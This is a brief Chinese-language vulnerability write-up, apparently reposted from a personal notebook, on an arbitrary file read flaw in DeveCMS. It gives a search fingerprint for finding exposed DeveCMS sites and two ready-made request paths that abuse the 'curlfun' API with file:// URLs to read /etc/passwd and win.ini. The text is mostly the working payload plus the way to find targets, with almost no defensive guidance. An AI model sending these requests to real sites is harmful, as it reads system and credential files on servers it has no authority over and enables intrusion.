登录 白背景

DeveCMS存在任意文件读取漏洞

一、漏洞描述

DeveCMS存在任意文件读取漏洞

二、影响版本

DeveCMS

三、资产测绘

"/static/index/css/ionic.css" && "devework.com"

1718300108267-9e816460-8fef-46d7-993d-4882ee1a8dd6.png

四、漏洞复现

 /index.php/index/Api/curlfun?url=file:///etc/passwd
 /index.php/index/Api/curlfun?url=file:///C:/windows/win.ini

1718300096919-93a0f2aa-37ca-4e0f-bcaa-cde22335fe27.png

原文: https://www.yuque.com/xiaokp7/ocvun2/qq1ntrnbmqtudkvy